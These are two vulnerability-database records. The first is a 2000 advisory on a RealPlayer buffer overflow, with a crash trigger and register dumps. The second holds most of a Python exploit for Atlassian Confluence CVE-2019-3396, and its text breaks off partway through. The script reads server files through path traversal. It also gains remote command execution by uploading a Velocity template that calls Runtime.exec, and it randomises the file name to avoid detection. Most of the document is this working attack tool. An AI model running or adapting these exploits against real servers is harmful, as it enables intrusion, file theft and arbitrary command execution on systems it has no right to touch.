{"id": "SECURITYVULNS:DOC:9", "bulletinFamily": "software", "title": "Win32 RealPlayer 6/7 Buffer Overflow", "description": "Win32 Realplayer 6/7 Buffer Overflow\r\n\r\nVulnerability Summary:\r\n----------------------\r\nThere is a buffer overflow in the Win32 RealPlayer Basic client,\r\nversions 6 and 7. This appears to occur when >299 characters\r\nare entered as a 'location' to play, such as http://aaaaa.....\r\nwith 300 a's. I have tested the MacOS and Linux Realplayer\r\nclients and have as yet not found such a vulnerability.\r\n\r\nUsing the HTML "EMBED" tag to embed RealPlayer in a webpage\r\nand setting the "AUTOSTART=true" flag, you can force RealPlayer\r\nto start automatically, triggering the overflow condition.\r\nWhile I have not taken the time to find the proper entrance\r\npoint in PNEN3260.DLL (which is what crashes, for example,\r\nin RealPlay 6 Basic), it appears that arbitrary code could\r\nbe exploited simply by *VISITING* a webpage with the\r\nmalicious embedded RealPlayer tags.\r\n\r\n(the following example is using RealPlayer v.6 Basic)\r\n\r\nIn full effect, yo:\r\n-------------------\r\nFor example: RealPlayer Win32 Version 6.0.7.380\r\nType into "Location" http://aaaaaaaaaaa..... (300 a's)\r\n\r\n"This program has performed an illegal operation and will be shut\r\ndown."\r\nREALPLAY caused an invalid page fault in\r\nmodule PNEN3260.DLL at 015f:6216d7ca.\r\nRegisters:\r\nEAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202\r\nEBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88\r\nECX=007c0350 DS=0167 ESI=007c0350 FS=629f\r\nEDX=00000001 ES=0167 EDI=007c0350 GS=0000\r\nBytes at CS:EIP:\r\nff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d\r\nStack dump:\r\n007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c\r\n6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100\r\n007c0100 00c6fed4\r\n\r\nFun. It looks like RealPlayer can be made to execute arbitrary\r\ncode. It gets worse, using the HTML EMBED tag for RealPlayer you\r\ncan force a web browser (MSIE in this case) to crash as well.\r\nThis is left as an exercise for the reader....\r\n\r\nOnce you embed the RealPlayer in an html page, when Real crashes,\r\nit takes Internet Explorer with it...\r\n\r\n"This program has performed an illegal operation and will be shut\r\ndown"\r\nIEXPLORE caused an invalid page fault in\r\nmodule KERNEL32.DLL at 015f:bff7a379.\r\nRegisters:\r\nEAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216\r\nEBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864\r\nECX=61616161 DS=0167 ESI=000003b4 FS=5ac7\r\nEDX=084d0000 ES=0167 EDI=01615dac GS=0000\r\nBytes at CS:EIP:\r\n89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50\r\nStack dump:\r\n01615dac 00000000 084d000c 084d0000 084e5054\r\n00000000 00000000 00009afb 000084e6 0058d88c\r\nbff7a541 084d0000 084e5054 000003b4 00000000\r\n00000001\r\n\r\n\r\nand the extra bonus of:\r\n"This program has performed an illegal operation and will be shut\r\ndown"\r\nIEXPLORE caused an invalid page fault in\r\nmodule PNEN3260.DLL at 015f:621874ba.\r\nRegisters:\r\nEAX=8004004e CS=015f EIP=621874ba EFLGS=00010202\r\nEBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4\r\nECX=08616860 DS=0167 ESI=086163e0 FS=3937\r\nEDX=61616161 ES=0167 EDI=8004004e GS=0000\r\nBytes at CS:EIP:\r\nff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90\r\nStack dump:\r\n08616b90 085e69f0 067dfeec 6218893b 085034ec\r\n00400050 00400000 00400000 067dff04 621838b4\r\n08616b90 04606568 0000023c 086163e0 067dff38\r\n62183a47\r\n\r\nload the malicious page enough times and you get a fun dialog box\r\nthat just won't go away... unless you reboot.\r\n\r\n"This program has performed an illegal operation and will be shut\r\ndown"\r\nIEXPLORE caused an invalid page fault in\r\nmodule KERNEL32.DLL at 015f:bff87eb5.\r\nRegisters:\r\nEAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206\r\nEBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c\r\nECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f\r\nEDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000\r\nBytes at CS:EIP:\r\n53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75\r\nStack dump:\r\n\r\netc etc etc.\r\n\r\nResolution:\r\n-----------\r\nVendor Notified 3 April 2000, 10:00 AM MST via email.\r\nVendor patch should be forthcoming...\r\n\r\n----------------------------------------------------\r\n- Adam Muntner \ Save the Whales! -\r\n- adam@alienzoo.com \ Collect Valuable -\r\n- Systems Engineer \ Prizes! -\r\n- http://www.alienzoo.com \ -\r\n----------------------------------------------------\r\n\r\n-----------------------------------------------------\r\n Get free email and alien enlightenment from\r\n http://www.alienzoo.com\r\n", "published": "2000-04-04T00:00:00", "modified": "2000-04-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:03", "edition": 1, "viewCount": 12, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-08-31T11:10:03", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:1B47C8EE3F38D95B4DA090A5B2D64F5A"]}, {"type": "redhat", "idList": ["RHSA-2020:1561"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F84925E1E509D9A73D1C4D15264AA46E"]}, {"type": "securelist", "idList": ["SECURELIST:E0FBD6960E2DB5FF19FE52D7B7A52830"]}, {"type": "mskb", "idList": ["KB3185331", "KB3062157", "KB3174644", "KB4535288"]}, {"type": "ics", "idList": ["ICSA-19-122-03"]}, {"type": "cve", "idList": ["CVE-2020-11649", "CVE-2020-11506", "CVE-2020-11505"]}, {"type": "mssecure", "idList": ["MSSECURE:4D0C35E1C7C6A3EB51F5C0542FEBB02C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E1441E75F6C68977ED2901EE1AF27E6D"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-70942", "ATLASSIAN:JRASERVER-70945", "ATLASSIAN:JRASERVER-70943"]}, {"type": "nessus", "idList": ["SL_20200421_JAVA_1_7_0_OPENJDK_ON_SL7_X.NASL", "REDHAT-RHSA-2020-1516.NASL", "ORACLELINUX_ELSA-2020-1508.NASL"]}], "modified": "2018-08-31T11:10:03", "rev": 2}, "vulnersScore": 6.3}, "affectedSoftware": []}

{"packetstorm": [{"lastseen": "2021-01-22T15:47:25", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian \nConfluence Server server-side template injection. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made \nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being \nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all \noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this \nalternative approach by first uploading the template to the server and then loading it with original vulnerability from \nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any \nuser can upload a file to the server by attaching the file to his \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. \n \nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged \nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode \nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path \nis pointing to. As in original exploit no authentication is needed for this mode. \n \nLimitations of path traversal exploit: \n- not possible to distinguish between non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A \nregular user probably has enough privileges for this since each user can have their own personal space where they \nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not \nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file \nwith payload from local filesystem instead from remote system. \n \nPrerequisite of RCE in this exploit: \n- authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode \nto find it, should be in Confluence install directory under ./attachments subdirectory \n \nUsage \n- list /etc folder on Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get content of /etc/passwd on same server but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using \nexisting session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download Confluence trial version for version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser \nnetwork tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and \nchange the version in URL to be 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure initial installation, when you get to license window copy the server ID. \n4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. \n5. Activate the license and finish the installation with default options. \n6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. \n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", \nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template \" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. \n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property \ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by it's ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. \n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") \noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'result' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. \n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. \ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute 